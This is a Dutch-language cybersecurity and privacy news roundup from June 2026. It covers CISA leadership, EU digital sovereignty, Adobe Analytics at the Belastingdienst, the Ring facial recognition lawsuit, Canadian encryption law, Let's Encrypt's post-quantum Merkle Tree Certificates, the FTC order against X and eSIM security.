Mullin liet doorschemeren dat het Witte Huis binnenkort een kandidaat zal aankondigen om de cyberafdeling van het departement te leiden. Deze functie is onbezet geweest door een door de Senaat bevestigde leider sinds president Trump opnieuw aantrad. Een eerdere kandidaat trok zich in april terug. Mullin verklaarde: "We hebben een persoon die binnenkort wordt genomineerd en CISA zal leiden, die de mogelijkheid heeft om te werven en zich te richten op de bevoegdheden die we hebben. We willen dat CISA de leider is op het gebied van cyberbeveiliging. Dat moeten ze zijn en dat zullen ze zijn."

Verder werd Mullin gevraagd waarom het ministerie van Financiën werd aangewezen als het centrale punt voor de afhandeling van kwetsbaarheden in het executive order over artificiële intelligentie dat Trump dinsdag ondertekende, terwijl het Congres CISA bedoelde als de leidende federale entiteit in samenwerking met de private sector. Mullin antwoordde dat de grootste dreigingen waarvoor artificiële intelligentie wordt gebruikt, verband houden met financieel gewin. Hij voegde eraan toe dat hij regelmatig spreekt met minister van Financiën Scott Bessent en dat er comfort is met zijn leiding op dit gebied, gezien de samenwerking met CISA en de unieke autoriteit. Mullin concludeerde dat door de coördinatie de voorbereiding beter is dan wanneer het alleen binnen het Department of Homeland Security zou blijven.

 

Bron: recordedfuture.com

04 juni 2026 | Brussel presenteert plan voor digitale soevereiniteit Europa

De Europese Commissie heeft een omvangrijk plan onthuld dat tot doel heeft Europa digitaal soeverein te maken. Dit initiatief, onderdeel van het 'Technological Sovereignty Package', omvat aanzienlijke investeringen in cruciale technologieën zoals halfgeleiders, kunstmatige intelligentie (AI), cloudoplossingen en open source. Tegelijkertijd zal er nieuw beleid worden ontwikkeld om deze sectoren te reguleren en te ondersteunen.

Volgens de Europese Commissie is het van essentieel belang dat Europa onafhankelijk wordt op deze strategische technologische gebieden. De Commissie benadrukt dat Europese burgers het recht hebben op een veilige en betrouwbare digitale omgeving waarin hun gegevens worden opgeslagen, met duidelijke garanties tegen ongewenste uitwisseling. Door structurele afhankelijkheden te verminderen en Europa in staat te stellen de technologieën te ontwikkelen, uit te rollen en te beveiligen waarop Europeanen dagelijks vertrouwen, wordt een veiligere en betrouwbaardere toekomst voor de regio gebouwd.

Een van de speerpunten van het vandaag gepresenteerde pakket is de Europese Opensourcestrategie. Deze strategie heeft meerdere doelen: het aanmoedigen van het gebruik van bestaande open source oplossingen binnen zowel de publieke als de private sectoren, het ondersteunen van Europese organisaties bij het actief bijdragen aan de ontwikkeling van open source, inclusief alternatieven voor Amerikaanse software, en het algeheel versterken van het Europese open source ecosysteem.

De concrete wetsvoorstellen die voortvloeien uit dit pakket zullen nu het onderwerp zijn van onderhandelingen tussen de Europese Commissie, het Europees Parlement en de lidstaten. Dit proces zal de komende periode in beslag nemen, waarna de plannen definitief kunnen worden geïmplementeerd.

 

Bron: Europese Commissie | Bron 2: ec.europa.eu

04 juni 2026 | Kamer wil opheldering over Adobe Analytics bij Belastingdienst

De Tweede Kamer heeft dringende vragen gesteld aan staatssecretarissen Eerenberg van Financiën en Aerdts voor Digitale Economie over het gebruik van Adobe Analytics binnen de betaalomgeving van de Belastingdienst. Aanleiding voor deze Kamervragen, ingediend door JA21-Kamerlid Joost van den Berg, is een eerder verschenen artikel dat details gaf over de informatie die Adobe zou ontvangen van mensen die hun belasting betalen via de diensten van de Belastingdienst. Specifiek zou het hierbij gaan om details zoals de aard van de vordering en de geopende aanslag.

Kamerlid Van den Berg heeft de staatssecretarissen specifiek gevraagd of het klopt dat binnen "Mijn Belastingdienst", na succesvolle inlog met DigiD, gegevens worden verzonden naar `adobe-analytics-dc.belastingdienst.nl` bij het openen van een aanslag en het starten of annuleren van een betaling via iDEAL of Wero. Hij benadrukt daarbij dat dit domein technisch doorverwijst naar de infrastructuur van Adobe, waaronder `data.adobedc.net`. Deze technische koppeling roept vragen op over de reikwijdte van de gegevensuitwisseling.

Een cruciaal punt van de Kamervragen betreft de aard van de verzonden gegevens. De staatssecretarissen Eerenberg en Aerdts moeten duidelijk maken of het is uitgesloten dat een reeks gevoelige data, waaronder bedragen, Burgerservicenummer (BSN), IBAN-nummers, betalingskenmerken, aanslagnummers, vorderingsidentificaties, claim-identifiers, IP-adressen, sessiegegevens, referrers of andere direct of indirect herleidbare gegevens, wordt verstrekt aan Adobe of aan systemen die aan Adobe zijn gelieerd.

Verder wil Van den Berg weten welke juridische grondslag er bestaat onder de Algemene Verordening Gegevensbescherming (AVG) voor het meten van dit betaalgedrag binnen een verplichte overheidsdienst, die bovendien toegankelijk is via een DigiD inlog. Hierbij moeten de staatssecretarissen een grondige beoordeling geven van de noodzakelijkheid, proportionaliteit en subsidiariteit van dergelijke gegevensverwerking. Dit zijn kernprincipes binnen de AVG die bepalen of gegevensverwerking rechtmatig is.

Als laatste element van de Kamervragen wordt verzocht om een onderzoek in te stellen naar de praktijk van het verzenden van betaalflowgegevens aan Adobe Analytics. Zolang de rechtmatigheid en proportionaliteit van deze gegevensverstrekking niet overtuigend zijn vastgesteld, wordt er bij de staatssecretarissen aangedrongen op een tijdelijke stopzetting van deze activiteit. De Tweede Kamer heeft tevens geëist dat zij binnen twee weken een gedetailleerde tijdlijn, een technische analyse van de gegevensstromen, een Data Protection Impact Assessment (DPIA), de betreffende verwerkersovereenkomst en alle relevante beslisnota’s ontvangen. De staatssecretarissen hebben vervolgens drie weken de tijd om met een officiële reactie op alle gestelde Kamervragen te komen.

 

Bron: Belastingdienst

04 juni 2026 | Ring aangeklaagd in VS over gezichtsherkenning in deurbelcamera's

Deurbelcamerafabrikant Ring is in de Verenigde Staten voor de rechter gedaagd door een man die beweert dat het bedrijf gezichtsherkenningstechnologie heeft gebruikt om afbeeldingen van zijn gezicht op te nemen en te bewaren, zonder hiervoor zijn toestemming te verkrijgen. De aanklacht richt zich specifiek op de "Familiar Faces" functie van Ring. Deze optie stelt Ring-gebruikers in staat om personen te taggen, waarna de camera deze bekende gezichten in de toekomst kan herkennen. Wanneer de functie is ingeschakeld, scant de deurbelcamera de gezichten van alle voorbijgangers om de vooraf getagde bekenden te identificeren.

Volgens de klager is er geen toestemming verkregen van mensen wier gezichten door Ring-camera's worden gescand en van wie een 'faceprint' wordt opgeslagen. Dit zou een schending vormen van de privacyrechten van deze personen. De aanklacht stelt dat "Ring bij deze ingangen technologie blijft uitrollen voor massasurveillance, zonder dat het hiervoor toestemming heeft." Met 'ingangen' bedoelt de klager zowel woningen als bedrijven die de deurbelcamera's gebruiken. Tevens beweert de klager dat Ring zich onrechtmatig heeft verrijkt door het gebruik en de opslag van biometrische data, aangezien de verkoop van de camera's toeneemt als gevolg van de "Familiar Faces" functie. De klager eist een schadevergoeding van minimaal vijf miljoen dollar.

De Amerikaanse senator Edward Markey uitte eerder al kritiek op de functie, die hij omschreef als een "privacynachtmerrie". De senator waarschuwde dat de toevoeging van gezichtsherkenning aan deurbelcamera's een significante stap is richting een dystopische toekomst, waarin Amerikaanse burgers hun huis niet kunnen verlaten zonder te worden gevolgd en gesurveilleerd. Hij merkte op dat door de introductie van deze functie rond de feestdagen, Amazon bezorgers, inclusief de eigen chauffeurs, dwingt hun biometrische data af te staan bij elke pakketbezorging. Markey noemde deze uitbreiding van gezichtsherkenningstechnologie "roekeloos" en een "privacycrisis". Vanwege de gevoeligheid van de functie besloot Ring deze niet beschikbaar te maken in Amerikaanse staten met strenge biometrische wetgeving.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

04 juni 2026 | Duitse politie kocht commerciële locatiegegevens voor tracking zonder bevel

Duitse politie heeft commerciële locatiegegevens aangekocht die afkomstig zijn van telefoonapplicaties en door databrokers zijn doorverkocht. Deze gegevens werden gebruikt om telefoons te volgen zonder de noodzaak van een gerechtelijk bevel. Een recent onderzoek heeft bevestigd dat ten minste twee deelstaat-recherchebureaus deze praktijk hebben toegepast.

Deze methode, waarbij gevoelige locatiegegevens van burgers worden verkregen via commerciële kanalen buiten de traditionele juridische procedures om, heeft tot aanzienlijke bezorgdheid geleid. Experts op het gebied van privacy en recht stellen dat de aankoop van dergelijke gegevens zonder een gerechtelijk bevel waarschijnlijk onwettig is. Het omzeilen van de wettelijke vereisten voor het verkrijgen van locatiegegevens roept fundamentele vragen op over de bescherming van burgerrechten en de grenzen van politionele bevoegdheden.

De betreffende commerciële locatiegegevens worden doorgaans verzameld via diverse apps die gebruikers op hun smartphones installeren. Deze apps vragen vaak om toegang tot locatiegegevens voor functionaliteit, waarna de verzamelde data geanonimiseerd of gepseudonimiseerd wordt doorverkocht aan databrokers. Databrokers bundelen en verrijken deze datasets, waarna ze deze aan diverse afnemers, waaronder in dit geval overheidsinstanties, aanbieden. Hoewel de gegevens mogelijk niet direct identificeerbaar zijn, kan de combinatie van datasets in veel gevallen leiden tot de-anonimisering van individuen.

Als reactie op de onthullingen heeft een gegevensbeschermingsautoriteit in Duitsland een onderzoek ingesteld naar de praktijken van de politie. Dit onderzoek zal moeten uitwijzen in hoeverre de aankoop en het gebruik van deze commerciële locatiegegevens stroken met de geldende privacywetgeving, zoals de Algemene Verordening Gegevensbescherming (AVG) binnen de Europese Unie, en de nationale wetgeving inzake gegevensbescherming. De uitkomst hiervan kan verstrekkende gevolgen hebben voor de manier waarop wetshandhavingsinstanties in de toekomst met digitale gegevens omgaan en zal mogelijk leiden tot strengere regulering van de databroker-industrie.

 

Bron: Cybercrimeinfo

04 juni 2026 | Canadese veiligheidswet bedreigt encryptie; techreuzen dringen aan op aanpassingen

Apple en Google voeren druk uit op de Canadese overheid om wetsvoorstel Bill C-22, een nieuwe wet inzake online veiligheid, aan te passen. Deze wet, die momenteel in het Canadese parlement wordt besproken, kan volgens de technologiebedrijven de beveiliging van versleutelde communicatie ondermijnen. Ook Meta heeft zich bij deze zorgen aangesloten.

Het voornaamste punt van zorg is dat de wet politie- en veiligheidsdiensten meer toegang zou kunnen geven tot versleutelde gegevens. Hoewel het wetsvoorstel geen expliciete eis bevat voor het inbouwen van "achterdeurtjes" (backdoors), vrezen de bedrijven dat de overheid hen via geheime bevelen kan dwingen om encryptie te verzwakken.

Bij end-to-end encryptie, een standaard voor veel communicatiediensten, kunnen alleen de verzender en ontvanger berichten lezen. Zelfs het bedrijf dat de dienst aanbiedt, heeft geen toegang tot de inhoud. Apple benadrukt dat het daarom technisch onmogelijk is om gegevens van gebruikers zomaar te overhandigen zonder de onderliggende beveiliging fundamenteel aan te passen.

Google heeft tijdens een hoorzitting gewaarschuwd dat geheime overheidsbevelen in strijd zijn met democratische transparantie. Apple verwees impliciet naar eerdere conflicten met het Verenigd Koninkrijk. Daar heeft het bedrijf bepaalde functies van iCloud verwijderd nadat de Britse autoriteiten toegang tot versleutelde data eisten. Erik Neuenschwander, directeur bij Apple, wilde niet bevestigen of Apple zich uit Canada zou terugtrekken als het bedrijf gedwongen wordt encryptie te verzwakken, maar sprak wel de hoop uit dat het parlement het wetsvoorstel nog zal aanpassen.

Organisaties die zich richten op privacy en veel gebruikers van het internet, die kritisch staan tegenover de wet, vrezen dat verplichte achterdeuren uiteindelijk ook misbruikt kunnen worden door kwaadwillende hackers of buitenlandse staten. Op platforms zoals Reddit en binnen gemeenschappen die zich richten op privacy wordt Bill C-22 daarom regelmatig vergeleken met omstreden wetgeving in het Verenigd Koninkrijk en Australië, landen die eveneens pogingen hebben gedaan om toegang tot versleutelde communicatie te forceren. De discussie benadrukt de wereldwijde spanning tussen de behoeften van de overheid aan inlichtingen en het recht op privacy en digitale veiligheid van burgers.

 

Bron: appleinsider.com

04 juni 2026 | Staatssecretaris: niet alle AI-systemen hoeven vooraf te worden getest

Staatssecretaris Aerdts, verantwoordelijk voor Digitale Economie, heeft aangegeven dat niet alle systemen die gebruikmaken van kunstmatige intelligentie (AI) voorafgaand aan hun inzet getest hoeven te worden. Dit standpunt werd door de staatssecretaris naar voren gebracht tijdens een vragenuur in de Tweede Kamer. Hierin reageerde zij op zorgen van het CDA over rapporten die suggereren dat AI modellen op grote schaal de wet overtreden.

De staatssecretaris benadrukte de inzet van het kabinet voor een verantwoorde implementatie van AI. Ze uitte haar bezorgdheid over de mogelijkheid om AI modellen opdrachten te geven die in strijd zijn met de AI-verordening of andere wetgeving. Dergelijke overtredingen ondermijnen niet alleen de waarde van de AI-uitkomsten, maar schaden ook het vertrouwen van het publiek in AI-technologie.

De AI-verordening, die de regels voor AI-systemen vaststelt, is reeds gedeeltelijk van kracht. Specifieke praktijken, zoals misleiding of manipulatie door AI, zijn op dit moment al verboden. Aerdts erkende dat wetgeving inherent achterloopt op technologische ontwikkelingen, wat vooral bij AI een uitdaging vormt. Een cruciaal aspect dat nog ontbreekt in Nederland is de aanwijzing van toezichthouders in het kader van deze verordening, wat volgens de staatssecretaris leidt tot een juridisch vacuüm.

CDA-Kamerlid Zwinkels stelde vragen over de juridische aansprakelijkheid wanneer een autonome AI-agent de wet overtreedt. De staatssecretaris legde uit dat de verantwoordelijkheid in principe ligt bij de ontwikkelaars van AI-taalmodellen voor de wijze waarop zij hun modellen configureren. Daarnaast dragen gebruikers ook een verantwoordelijkheid voor de aard van de vragen die zij aan de systemen stellen. Echter, Aerdts erkende dat deze verantwoordelijkheid niet volledig bij de gebruikers kan liggen en dat de AI-verordening voorschrijft dat bedrijven gebruikersinstructies moeten verstrekken. Het specifieke juridische vraagstuk van volledige aansprakelijkheid wordt momenteel nog in Europees verband besproken.

Wat betreft het testen van AI-systemen merkte Aerdts op dat dit een risicogestuurde aanpak volgt, vergelijkbaar met de werkwijze van de Nederlandse Voedsel- en Warenautoriteit (NVWA). Alleen AI-systemen met een hoog risico moeten voorafgaand aan de inzet worden getest. De staatssecretaris wees erop dat het niet haalbaar is om alle systemen te testen, mede gezien de behoefte aan innovatie. Een eenvoudig AI-systeem, zoals een geavanceerde Excel-sheet, zou bijvoorbeeld niet vooraf getest hoeven te worden.

De eerste regels van de AI-verordening zijn in Nederland sinds 2 februari vorig jaar van kracht, en de gehele wet zal op 2 augustus 2027 van toepassing zijn. De Autoriteit Persoonsgegevens heeft vorig jaar augustus al geconstateerd dat de aanwijzing van toezichthouders voor de naleving van de AI-verordening destijds al had moeten plaatsvinden.

 

Bron: Tweede Kamer

04 juni 2026 | Aangeboden database van Christelijke Mutualiteit is een valse claim

Eind mei verscheen op een cybercrimeforum een advertentie waarin een zogenaamde database van de Christelijke Mutualiteit werd aangeboden, het grootste ziekenfonds van België. Cybercrimeinfo bracht deze melding op 29 mei nadrukkelijk als onbevestigde claim, omdat de gegevens op dat moment niet te verifiëren waren.

Inmiddels is er rechtstreeks contact geweest met de Christelijke Mutualiteit. De securityafdeling van CM heeft de claim zelf onderzocht en bevestigt rechtstreeks aan Cybercrimeinfo dat het om een valse claim gaat. Concreet stelt CM vast dat de in de advertentie vermelde domeinnaam foutief is, en dat de gepubliceerde voorbeeldgegevens niet overeenkomen met de werkelijke data van de organisatie. Op basis van die vaststellingen moet de claim als fake worden beschouwd.

Ook de eigen analyse van Cybercrimeinfo wijst die kant op. Het opgegeven webadres komt niet overeen met de echte domeinen van de organisatie, de aangeboden data bestaat enkel uit algemene Engelstalige kolomnamen zonder echte voorbeeldgegevens, en de opbouw lijkt eerder op een algemeen commercieel klantenbestand dan op de gegevens van een Belgisch ziekenfonds.

Cybercrimeinfo meldt dit soort claims bewust, ook als ze nog niet bevestigd zijn. Door wat op het darkweb circuleert zichtbaar te maken, krijgen organisaties de kans om snel te controleren en waar nodig in te grijpen. Lang niet elke claim is vals, en juist door er vroeg melding van te maken is in het verleden meermaals schade voorkomen. Blijkt een claim ongegrond, zoals hier, dan corrigeren we dat even duidelijk.

Wel blijft voorzichtigheid op zijn plaats. Rond dezelfde periode circuleren er phishingberichten die de naam van de Christelijke Mutualiteit misbruiken. Ontvang je een bericht dat om je accountgegevens vraagt, klik dan niet op de link en ga rechtstreeks naar de officiële website van je ziekenfonds.

 

Bron: Cybercrimeinfo

05 juni 2026 | Let's Encrypt introduceert Merkle Tree Certificates voor kwantumveilige webauthenticatie

Let's Encrypt heeft zijn roadmap voor post-kwantum Web PKI onthuld, met een focus op Merkle Tree Certificates (MTCs). Dit nieuwe ontwerp moet kwantum-resistente authenticatie leveren zonder de omvang van TLS-handshakes te vergroten of de prestaties van het web te beïnvloeden.

Traditionele X.509 certificaatketens vereisen aanzienlijke bandbreedte, wat exponentieel zou toenemen bij de adoptie van robuuste post-kwantum algoritmen. MTCs adresseren dit probleem door de zware, geserialiseerde keten van handtekeningen te vervangen door compacte Merkle Tree proofs. Eerder dit jaar introduceerde Google al Merkle Tree Certificates als een manier om HTTPS te beschermen tegen kwantumdreigingen, waarbij Chrome een voortrekkersrol speelt in de overgang naar MTCs.

Jarenlang lag de prioriteit in discussies over post-kwantum cryptografie op encryptie boven authenticatie. De gedachte was dat "harvest now, decrypt later"-aanvallen versleuteld verkeer onmiddellijk kwetsbaar maken, terwijl het vervalsen van authenticatiehandtekeningen een live Cryptographically Relevant Quantum Computer (CRQC) vereist. Deze marge van veiligheid slinkt echter snel.

Diverse instanties hebben al deadlines gesteld voor de migratie naar post-kwantum algoritmen. De CNSA 2.0 suite van de NSA verplicht nationale veiligheidssystemen om tegen 2030-2035 te migreren. De conceptrichtlijnen van NIST (IR 8547) bepalen dat RSA-2048 en P-256 na 2030 worden afgekeurd en na 2035 niet meer zijn toegestaan. De post-kwantum roadmap van de EU richt zich op hoge-risicosystemen tegen eind 2030. Google kondigde een migratiedeadline van 2029 aan voor zijn diensten, en Cloudflare heeft een soortgelijke toezegging gedaan. Bovendien heeft Go 1.27 ML-DSA, een door NIST gestandaardiseerd post-kwantum handtekeningschema, direct toegevoegd aan zijn standaardbibliotheek, wat duidt op de gereedheid van de infrastructuur.

De schaal van Web PKI maakt een naïeve post-kwantum migratie ingewikkeld. ML-DSA-44, een van NIST's kleinere gestandaardiseerde schema's, produceert handtekeningen van ongeveer 2.420 bytes, wat bijna 38 keer groter is dan de 64 bytes van ECDSA-P256. Een typische TLS-handshake bevat vijf handtekeningen en twee publieke sleutels. Het vervangen hiervan door ML-DSA-equivalenten zou een enkele handshake ver boven de 10 KB duwen. Onderzoek van Cloudflare bevestigt de gevolgen: bij die schaal zou een aanzienlijk deel van de real-world TLS-verbindingen volledig falen, en de rest zou vertragen. Het degraderen van elke TLS-verbinding wereldwijd is een te grote concessie voor een dreiging die nog niet is gematerialiseerd.

MTCs herdefiniëren de manier waarop certificaten worden uitgegeven en geverifieerd. In plaats van elk certificaat afzonderlijk te ondertekenen, geeft een Certificate Authority (CA) certificaten in batches uit, met een enkele post-kwantum handtekening die de hele batch dekt. Clients, zoals browsers, onderhouden deze batchhandtekeningen, ook wel 'landmarks' genoemd, onafhankelijk van de TLS-handshake. Het resultaat is dat een MTC-handshake slechts één handtekening, één publieke sleutel en één 'inclusion proof' bevat die kleiner is dan de huidige Web PKI-handshake, zelfs bij gebruik van post-kwantum algoritmen.

MTCs integreren ook Certificate Transparency (CT) van nature. Elk certificaat maakt deel uit van een gepubliceerde Merkle tree, waardoor transparantie intrinsiek is aan de uitgifte in plaats van achteraf toegevoegd. Let's Encrypt beheert al sinds 2019 CT logs die gebouwd zijn op Merkle trees, wat het bedrijf directe operationele ervaring geeft met de kern datastructuur.

Het MTC-ecosysteem is al in beweging: Cloudflare en Chrome voeren een live MTC-haalbaarheidsexperiment uit met echt internetverkeer, de IETF PLANTS-werkgroep standaardiseert actief het ontwerp, en Chrome heeft MTCs uitgeroepen tot zijn voorkeursroute voor post-kwantum certificaten op het publieke web. Let's Encrypt streeft naar een staging MTC-omgeving eind 2026 en een productieklare omgeving in 2027. Deze uitrol vereist grote veranderingen in de uitgifte-infrastructuur, het ACME-protocol (RFC 9881), de intrekkingstools en de CT log-infrastructuur.

Voor bestaande abonnees verandert er vandaag niets; certificaten zullen via ACME precies zoals voorheen worden uitgegeven. ACME clientbeheerders moeten echter nu al de PLANTS-werkgroep en de mtcs@chromium.org mailinglijst volgen, aangezien client-side wijzigingen nodig zullen zijn. Voor serveroperators blijft de meest urgente actie vandaag het inschakelen van hybride post-kwantum sleuteluitwisseling (X25519MLKEM768), de primaire verdediging tegen "harvest now, decrypt later"-aanvallen op versleuteld verkeer.

 

Bron: Flare | Bron 2: nsa.gov | Bron 3: blog.google

05 juni 2026 | Nieuwe beheerder DigiD moet Europees zijn

Staatssecretaris Eric van der Burg van Binnenlandse Zaken heeft de Tweede Kamer geïnformeerd over een significante beleidswijziging met betrekking tot het beheer van DigiD. In een recente brief aan de Kamer heeft de staatssecretaris expliciet gesteld dat de toekomstige beheerder van een deel van de dienstverlening van DigiD van Europese origine moet zijn. Deze nieuwe voorwaarde zal van kracht worden voor het contract dat na augustus 2028 van start gaat.

De procedure voor de aanbesteding van dit contract zal niet volgens de standaard regels voor aanbestedingen verlopen. In plaats daarvan zal de Aanbestedingswet Defensie en Veiligheid (ADV) worden toegepast. Dit houdt in dat de selectie van de betreffende onderneming zal plaatsvinden onder de strikte richtlijnen en vereisten die kenmerkend zijn voor aanbestedingen op het gebied van defensie en veiligheid. De brief van de staatssecretaris aan de Tweede Kamer dient als officiële aankondiging van deze beleidswijziging, waarmee de contouren van de toekomstige invulling van het beheer van DigiD worden geschetst.

 

Bron: Tweede Kamer

05 juni 2026 | FTC overweegt wijziging boete van $150 miljoen voor X (voorheen Twitter)

De Federal Trade Commission (FTC) heeft woensdag aangekondigd dat het overweegt een schikkingsbesluit uit 2022 te wijzigen of terzijde te schuiven. Dit besluit werd destijds opgelegd aan Twitter, nu bekend als X, vanwege het gebruik van accountbeveiligingsgegevens om gerichte advertenties te ondersteunen.

X heeft een verzoek ingediend waarin wordt gesteld dat de schikkingsvoorwaarden onredelijk zijn, omdat het besluit werd uitgevaardigd tegen een bedrijf dat "niet langer bestaat". Daarnaast beargumenteert X dat de werknemers die verantwoordelijk waren voor de betreffende praktijken niet langer in dienst zijn bij het bedrijf, en dat de onderneming sindsdien een "wereldwijd toonaangevend" programma voor privacy en gegevensbescherming heeft opgezet. Dit blijkt uit een oproep van de FTC voor publieke commentaar.

Het technologiebedrijf kreeg in 2022 een boete van $150 miljoen en het werd verboden om langer te profiteren van wat de FTC destijds omschreef als "misleidend verzamelde gegevens". Twitter kwam in oktober 2022 onder nieuw eigenaarschap toen Elon Musk het bedrijf kocht.

X beargumenteert verder dat het besluit "geen geldig regulerend doel meer dient, en miljoenen dollars aan onnodige kosten met zich meebrengt om te voldoen aan verplichtingen en beschermingen die al worden vereist door binnenlandse en internationale privacyregimes en door de industrie erkende raamwerken die X Corp. volgt". Het technologiebedrijf stelt dat het terzijde schuiven van het besluit in overeenstemming is met de principes van het Eerste Amendement en "cruciaal is voor het bevorderen van Amerikaans leiderschap op het gebied van kunstmatige intelligentie".

De FTC heeft het publiek uitgenodigd om commentaar te leveren op de vraag of het besluit moet worden gewijzigd of terzijde geschoven. De periode voor publieke commentaar eindigt op 2 juli, waarna het agentschap zal beslissen of het doorgaat met wijzigingen.

Het schikkingsbesluit van mei 2022 beweerde dat Twitter gebruikers aanmoedigde om hun telefoonnummers en e-mailadressen op te geven om hun accounts te beveiligen, maar de gegevens vervolgens verkocht aan adverteerders die gerichte advertenties aan specifieke consumenten wilden tonen, waarmee grote winsten werden behaald. De FTC stelde dat de acties van Twitter een overtreding waren van een besluit uit 2011, dat het bedrijf verbood het publiek te misleiden over zijn privacy- en beveiligingspraktijken.

FTC-voorzitter Lina Khan verklaarde destijds: "Twitter verkreeg gegevens van gebruikers onder het voorwendsel deze te gebruiken voor beveiligingsdoeleinden, maar gebruikte de gegevens vervolgens ook om gebruikers met advertenties te bestoken. Deze praktijk trof meer dan 140 miljoen Twitter-gebruikers, terwijl het de belangrijkste inkomstenbron van Twitter stimuleerde."

 

Bron: FTC | Bron 2: recordedfuture.com

05 juni 2026 | CISA kondigt richtlijn aan voor AI executive order met focus op kwetsbaarheidsbeheer

De Cybersecurity and Infrastructure Security Agency (CISA) is van plan om deze week een bindende operationele richtlijn uit te brengen voor federale agentschappen. Deze richtlijn zal de vereiste acties specificeren om de presidentiële executive order over kunstmatige intelligentie (AI) uit te voeren. Dit maakte CISA’s waarnemend directeur Nick Andersen bekend tijdens de TechNet Cyber conferentie in Baltimore.

Een belangrijk onderdeel van de richtlijn zal zich richten op het verminderen en beheren van kwetsbaarheden binnen de IT-infrastructuren van federale agentschappen. Andersen benadrukte verder dat CISA in de komende dagen specifieke toegang tot AI-capaciteiten zal uitrollen naar zijn partners.

De executive order over AI, die eerder deze week werd vrijgegeven, is een aangepaste versie van een eerdere iteratie. Deze eerdere versie werd ingetrokken na interne conflicten binnen de Amerikaanse regering en zorgen geuit door voormalig AI- en cryptocoördinator David Sacks. De meest recente versie van de order vraagt bedrijven om vrijwillig hun AI modellen ter testen voor te leggen aan de overheid, dertig dagen voordat deze publiekelijk worden gelanceerd. Oorspronkelijk werd hiervoor een termijn van negentig dagen voorgesteld.

Andersen erkende de potentiële risico's die sommige AI modellen met zich meebrengen, maar legde ook de nadruk op de mogelijkheden van AI om cyberbeveiligingsmaatregelen te versterken. Hij stelde de vraag hoe AI effectief kan worden ingezet als een defensief instrument om de blootstelling aan het aanvalsoppervlak te verminderen.

CISA zal een cruciale rol spelen bij de oprichting van het door de executive order beoogde "cyber clearinghouse" en zal tevens AI modellen beoordelen en valideren. Andersen voegde eraan toe dat de overheid aanzienlijk werk moet verrichten om het toenemende dreigingslandschap aan te pakken. Hij bekritiseerde de huidige staat van de IT infrastructuur, waarbij veel apparaten het einde van hun levensduur hebben bereikt en beperkte service bieden. Dit maakt het voor tegenstanders te gemakkelijk om in te dringen.

 

Bron: recordedfuture.com

05 juni 2026 | Kabinet acht gebruik tracking cookies problematisch bij dark patterns en consentmoeheid

Het Nederlandse kabinet erkent dat het gebruik van tracking cookies in bepaalde situaties problematisch kan zijn. Dit geldt met name wanneer gebruikers toestemming geven als gevolg van misleidende ontwerpen (dark patterns), een overvloed aan informatie, of 'consentmoeheid', waardoor hun werkelijke voorkeuren mogelijk niet worden weerspiegeld. Deze standpuntbepaling volgt op vragen van de Tweede Kamer aan minister Hermans van Volksgezondheid, Welzijn en Sport.

De Kamervragen, gesteld door GroenLinks-PvdA Kamerleden Vliegenthart, Kathmann en Moorman, kwamen voort uit onderzoek dat aantoonde dat grote Nederlandse drogisterijketens, zoals Kruidvat, Etos en Trekpleister, mogelijk gevoelige informatie over de vruchtbaarheid en seksuele gezondheid van klanten delen met Amerikaanse en Chinese technologiebedrijven. De Kamerleden wilden weten wat het oordeel van de minister was over het gebruik van tracking cookies door online webshops, en of het delen van gevoelige koopgedragsinformatie mogelijk in strijd is met de privacywetgeving.

Minister Hermans bevestigde dat het kabinet de opvatting deelt dat tracking cookies onder bepaalde omstandigheden problematisch kunnen zijn. Zij benadrukte dat voor het plaatsen van dergelijke cookies door online webshops de Algemene Verordening Gegevensbescherming (AVG) en de e-privacyrichtlijn van kracht zijn. Dit betekent dat er een geïnformeerde en ondubbelzinnige toestemming van de gebruiker vereist is. Wanneer het gaat om gevoelige persoonsgegevens, geldt zelfs een versterkt en expliciet vereiste voor toestemming.

De minister liet weten dat de beoordeling van mogelijke strijdigheid met de privacyregelgeving de verantwoordelijkheid is van de toezichthouder, in dit geval de Autoriteit Persoonsgegevens. Daarnaast gaf Hermans aan dat het kabinet zich zowel nationaal als Europees inzet om de informatie- en toestemmingsrechten van burgers op het gebied van tracking cookies te versterken.

 

Bron: Politie | Bron 2: tweedekamer.nl

05 juni 2026 | eSIMs bieden betere bescherming tegen SIM-swaps en vereenvoudigen mobiele diensten

De fysieke SIM-kaart verliest snel aan terrein ten gunste van de eSIM-technologie, die een eenvoudigere en veiligere benadering biedt voor mobiele connectiviteit. Industriële prognoses verwachten dat eSIMs tegen 2030 het merendeel van de smartphoneverbindingen zullen uitmaken, wat de snelle verschuiving in de mobiele sector benadrukt.

Een van de belangrijkste voordelen van eSIMs is de verhoogde weerstand tegen SIM-swap aanvallen. Bij deze aanvallen overtuigt een cybercrimineel een medewerker van een telecomprovider om het telefoonnummer van een slachtoffer over te zetten naar een SIM-kaart die de aanvaller controleert. Hierdoor kan de aanvaller oproepen, sms-berichten en op SMS gebaseerde tweefactorauthenticatiecodes ontvangen die bedoeld zijn voor de rechtmatige eigenaar. Het FBI’s 2025 Internet Crime Report registreerde 971 klachten over SIM-swaps, met een gemeld verlies van 17,4 miljoen dollar. Hoewel eSIMs het risico niet volledig elimineren, verminderen ze wel kwetsbaarheden zoals gestolen fysieke kaarten en persoonlijke SIM-overdrachten, omdat de eSIM ingebouwd is en niet fysiek kan worden verwijderd of verwisseld. De gegevens die aan het mobiele account zijn gekoppeld, worden opgeslagen in beschermde hardware op het apparaat, wat de beveiliging verder verhoogt.

De installatie van een eSIM gebeurt volledig digitaal. Gebruikers kunnen een QR-code scannen, een app van de provider gebruiken of een abonnement activeren tijdens de installatie van het apparaat. Het profiel van de provider wordt vervolgens draadloos aan de telefoon toegevoegd via eUICC (Embedded Universal Integrated Circuit Card). Dit maakt snelle activering mogelijk zonder wachttijd of winkelbezoek. Voor bedrijven betekent dit een efficiëntere manier om grote aantallen apparaten, zoals telefoons, tablets, trackers en IoT-apparatuur, te beheren. De GSMA publiceerde in 2023 de SGP.32-standaard om het op afstand beheren van eSIMs in IoT apparaten te vergemakkelijken.

Veel smartphones, waaronder recente modellen van Apple en Google Pixel, ondersteunen al eSIM en kunnen meerdere profielen opslaan. Dit biedt flexibiliteit voor gebruikers, bijvoorbeeld door werk- en persoonlijke lijnen gescheiden te houden of een kortlopend dataplan voor reizen te installeren. Diensten zoals Saily eSIM van Nord Security maken dit mogelijk via een app-gebaseerde setup. Bij verlies of diefstal van een apparaat kunnen eSIM-lijnen op afstand worden gedeactiveerd, wat een extra beveiligingslaag biedt.

